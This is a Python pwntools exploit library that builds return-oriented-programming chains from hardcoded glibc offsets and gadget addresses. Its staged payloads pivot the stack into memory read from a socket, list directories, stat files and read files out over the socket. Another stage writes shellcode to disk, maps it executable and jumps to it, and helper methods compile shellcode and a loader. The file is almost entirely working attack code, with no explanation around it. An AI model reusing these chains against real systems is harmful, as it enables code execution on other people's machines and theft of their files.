import os
import subprocess

from pwn import *

import logging
import coloredlogs


logger = logging.getLogger('ROPUtils')
logger.setLevel(logging.DEBUG)
coloredlogs.install(level='DEBUG', logger=logger,fmt='%(name)s:%(levelname)s:%(message)s')

class ROPUtils:
	FD_SOCKET = 5
	MAP_PRIVATE = 2
	PROT_READ = 1
	PROT_WRITE = 2
	PROT_EXEC = 4
	O_DIRECTORY = 0x10000
	MMAP_ADDR = 0x800000000
	
	def __init__(self,libc_base):
		self.libc_base = libc_base
		
		self.libc_read = self.libc_base + 0x10DFF0
		self.libc_open = self.libc_base + 0x10DD10
		self.libc_mmap = self.libc_base + 0x1188F0 
		self.libc_munmap = self.libc_base + 0x01189A0
		self.libc_mmap_internal = self.libc_base + 0x118909 
		self.libc_write = self.libc_base + 0x010E090
		self.libc_exit = self.libc_base + 0x46A70
		self.libc_close = self.libc_base + 0x10E830 
		self.libc_openat = self.libc_base + 0x10DEA0
		self.libc_getdents = self.libc_base + 0xDE2D0
		self.libc_xstat = self.libc_base + 0x10D4D0
		self.libc_exit = self.libc_base + 0x46A70
		self.libc_strcpy = self.libc_base + 0x224E0 
		self.libc_memcpy = self.libc_base + 0xA0980
		self.libc_usleep = self.libc_base + 0x115840
		self.libc_time = self.libc_base + 0xD0DF0 
		self.libc_utime = self.libc_base + 0x10D400
		self.libc_mkdir = self.libc_base + 0x10DC80
		self.libc_strcat = self.libc_base + 0x0225F0
		self.libc_seek = self.libc_base + 0x010E130
		self.libc_socket = self.libc_base + 0x1207D0
		self.libc_memset = self.libc_base + 0x22560
		self.libc_sprintf = self.libc_base + 0x061E50  

		self.pop_rbx_rbp = self.libc_base + 0x11891E
		self.set_r9_jmp_rax = self.libc_base + 0x000000000007e5e8 # mov r9, rsi ; jmp rax
		self.set_r8_pop_rbx = self.libc_base + 0x000000000011cc7a # mov r8, rbx ; mov rax, r8 ; pop rbx ; ret
		self.pop_rdx = self.libc_base + 0x000000000015f7e6 # pop rdx ; pop rbx ; ret
		self.pop_rsi = self.libc_base + 0x000000000002604f # pop rsi ; ret
		self.pop_rdi = self.libc_base + 0x0000000000023b72
		self.pop_rax = self.libc_base + 0x0000000000047400 # pop rax ; ret
		self.pop_rbx = self.libc_base + 0x000000000002fddf # pop rbx ; ret
		self.pop_rsp = self.libc_base + 0x000000000002f73a # pop rsp ; ret

		self.jmp_rax = self.libc_base + 0x023e91

		self.pivot = self.libc_base + 0x000000000008e25f # pop rbp ; pop r12 ; pop r14 ; ret

		self.ret = self.libc_base + 0x0000000000022679 # ret
		
	
	def set_r9(self,r9):
		ropchain = p64(self.pop_rsi)
		ropchain+= p64(r9)
		ropchain+= p64(self.pop_rax)
		ropchain+= p64(self.ret)
		ropchain+= p64(self.set_r9_jmp_rax)
		return ropchain

	def set_r8(self,r8,rbx=0):
		ropchain = p64(self.pop_rbx)
		ropchain+= p64(r8)
		ropchain+= p64(self.set_r8_pop_rbx)
		ropchain+= p64(rbx)
		return ropchain

	def call_mmap(self,addr,length,prot,flags,fd,off):
		ropchain = self.set_r9(off)
		ropchain+= self.set_r8(fd)
		ropchain+= p64(self.pop_rdx)
		ropchain+= p64(prot)
		ropchain+= p64(0xcafebabecafebabe)
		ropchain+= p64(self.pop_rsi)
		ropchain+= p64(length)
		ropchain+= p64(self.pop_rbx_rbp)
		ropchain+= p64(flags)
		ropchain+= p64(addr)
		ropchain+= p64(self.libc_mmap_internal)
		ropchain+= p64(0xcafebabecafebabe)
		ropchain+= p64(0xcafebabecafebabe)
		return ropchain

	def call_read(self,fd,buffer,length):
		ropchain = p64(self.pop_rdx)
		ropchain+= p64(length)
		ropchain+= p64(0xcafebabecafebabe)
		ropchain+= p64(self.pop_rdi)
		ropchain+= p64(fd)
		ropchain+= p64(self.pop_rsi)
		ropchain+= p64(buffer)
		ropchain+= p64(self.libc_read)
		return ropchain

	def call_write(self,fd,buffer,length):
		ropchain = p64(self.pop_rdx)
		ropchain+= p64(length)
		ropchain+= p64(0xcafebabecafebabe)
		ropchain+= p64(self.pop_rdi)
		ropchain+= p64(fd)
		ropchain+= p64(self.pop_rsi)
		ropchain+= p64(buffer)
		ropchain+= p64(self.libc_write)
		return ropchain	

	def call_open(self,filename,flags,mode):
		ropchain = p64(self.pop_rdi)
		ropchain+= p64(filename)
		ropchain+= p64(self.pop_rsi)
		ropchain+= p64(flags)
		ropchain+= p64(self.pop_rdx)
		ropchain+= p64(mode)
		ropchain+= p64(0xcafebabecafebabe)
		ropchain+= p64(self.libc_open)
		return ropchain

	def call_close(self,exit_code):
		ropchain = p64(self.pop_rdi)
		ropchain+= p64(exit_code)
		ropchain+= p64(self.libc_close)
		return ropchain

	def call_exit(self,exit_code):
		ropchain = p64(self.pop_rdi)
		ropchain+= p64(exit_code)
		ropchain+= p64(self.libc_exit)
		return ropchain
		
	def call_strcpy(self,dest,src):
		ropchain = p64(self.pop_rdi)
		ropchain+= p64(dest)
		ropchain+= p64(self.pop_rsi)
		ropchain+= p64(src)
		ropchain+= p64(self.libc_strcpy)
		return ropchain

	def call_getdents(self,fd,buffer,size):
		ropchain = p64(self.pop_rdi)
		ropchain+= p64(fd)
		ropchain+= p64(self.pop_rsi)
		ropchain+= p64(buffer)
		ropchain+= p64(self.pop_rdx)
		ropchain+= p64(size)
		ropchain+= p64(0xcafebabecafebabe)
		ropchain+= p64(self.libc_getdents) 
		return ropchain

	def call_xstat(self,filename,buffer):
		ropchain = p64(self.pop_rdi)
		ropchain+= p64(1)
		ropchain+= p64(self.pop_rsi)
		ropchain+= p64(filename)
		ropchain+= p64(self.pop_rdx)
		ropchain+= p64(buffer)
		ropchain+= p64(0xcafebabecafebabe)
		ropchain+= p64(self.libc_xstat)
		return ropchain

	def stage2_stat(self, filename):
		stage2 = p64(self.ret) * 16
		stage2+= self.call_xstat(0x800000000+0x118,0x800000000+0x400)
		stage2+= self.call_write(ROPUtils.FD_SOCKET,0x800000000+0x400,0x400)
		stage2+= self.call_close(ROPUtils.FD_SOCKET)
		logger.debug("name offset = 0x%x" % len(stage2))
		stage2+= filename + b"\0"
		return stage2
		
	def stage2_getdents(self, directory):
		stage2 = p64(self.ret) * 16
		stage2+= self.call_open(0x800000000+0xc0+16*8+8*3,ROPUtils.O_DIRECTORY,0)
		stage2+= self.call_getdents(8,0x800000000+0x400,0x1000)
		stage2+= self.call_write(ROPUtils.FD_SOCKET,0x800000000+0x400,0x1000)
		stage2+= self.call_close(ROPUtils.FD_SOCKET)
		stage2+= directory + b"\0"
		return stage2
		
	def stage2_extract(self, filename, file_size):
		stage2 = p64(self.ret) * 16
		stage2+= self.call_open(0x800000000+0x278,0,0)
		stage2+= self.call_mmap(0x800004000,file_size,ROPUtils.PROT_READ,ROPUtils.MAP_PRIVATE,8,0)
		stage2+= self.call_write(5,0x800004000,file_size)
		stage2+= self.call_write(5,0x800004000,file_size)
		stage2+= self.call_write(5,0x800004000,file_size)
		stage2+= self.call_write(5,0x800004000,file_size)
		stage2+= self.call_close(5)
		logger.debug("name offset = 0x%x" % len(stage2))
		stage2+= filename + b"\0"
		return stage2
		
	def stage2_load_stage3(self,stage3):
		# shellcode loader
		stage2 = p64(self.ret) * 16
		stage2+= self.call_open(ROPUtils.MMAP_ADDR + 0x200,0x42,0o777)
		stage2+= self.call_write(8,ROPUtils.MMAP_ADDR + 0x20a,len(stage3))
		stage2+= self.call_close(8)
		stage2+= self.call_open(ROPUtils.MMAP_ADDR + 0x200,0,0)
		stage2+= self.call_mmap(0, len(stage3), 0x5,2,8,0)
		stage2+= p64(self.jmp_rax)
		logger.debug("filename = %08.8x" % len(stage2))
		stage2+= b"shellcode\0"

		logger.debug("shellcode= %08.8x" % len(stage2))
		stage2+= stage3

		logger.debug("stage2 length = %08.8x" % len(stage2))
		return stage2
	
	def stage1_load_stage2(self,stage2):
		ropchain = self.call_mmap(ROPUtils.MMAP_ADDR,0x4000,0x3,0x22,0xFFFFFFFFFFFFFFFF,0)
		ropchain+= self.call_read(ROPUtils.FD_SOCKET,ROPUtils.MMAP_ADDR,len(stage2))
		ropchain+= p64(self.pop_rsp)
		ropchain+= p64(ROPUtils.MMAP_ADDR)
		return ropchain

		
	def generate_header(self):
		cwd = os.getcwd()
		os.chdir("shellcode")
		
		with open("generated.h","w") as f:
			f.write("#define LIBC_STRCPY 0x%08.8x\n" % self.libc_strcpy)
			f.write("#define LIBC_WRITE 0x%08.8x\n" % self.libc_write)
			f.write("#define LIBC_READ 0x%08.8x\n" % self.libc_read)
			f.write("#define LIBC_OPEN 0x%08.8x\n" % self.libc_open)
			f.write("#define LIBC_CLOSE 0x%08.8x\n" % self.libc_close)
			f.write("#define LIBC_MKDIR 0x%08.8x\n" % self.libc_mkdir)
			f.write("#define LIBC_MMAP 0x%08.8x\n" % self.libc_mmap)
			f.write("#define LIBC_MUNMAP 0x%08.8x\n" % self.libc_munmap)
			f.write("#define LIBC_TIME 0x%08.8x\n" % self.libc_time)
			f.write("#define LIBC_UTIME 0x%08.8x\n" % self.libc_utime)
			f.write("#define LIBC_GETDENTS64 0x%08.8x\n" % self.libc_getdents)
			f.write("#define LIBC_MEMCPY 0x%08.8x\n" % self.libc_memcpy)
			f.write("#define LIBC_MEMSET 0x%08.8x\n" % self.libc_memset)
			f.write("#define LIBC_SPRINTF 0x%08.8x\n" % self.libc_sprintf)
			f.write("#define LIBC_STRCAT 0x%08.8x\n" % self.libc_strcat)
			f.write("#define LIBC_STAT 0x%08.8x\n" % self.libc_xstat)
			f.write("#define LIBC_SEEK 0x%08.8x\n" % self.libc_seek)
			f.write("#define LIBC_SOCKET 0x%08.8x\n" % self.libc_socket)
		
		os.chdir(cwd)
		
	def build_loader(self):
		self.generate_header()
		
		cwd = os.getcwd()
		os.chdir("shellcode")
		
		make = subprocess.Popen(["make","loader"])
		make.wait()
		
		f = open("loader.bin","rb")
		loader =  f.read()
		f.close()

		os.chdir(cwd)
		return loader
		
	def build_shellcode(self):
		self.generate_header()
		
		cwd = os.getcwd()
		os.chdir("shellcode")
		
		make = subprocess.Popen(["make","shellcode"])
		make.wait()
				
		f = open("shellcode.bin","rb")
		shellcode = f.read()
		f.close()
		
		os.chdir(cwd)
		return shellcode
		
		
		

		

		

		
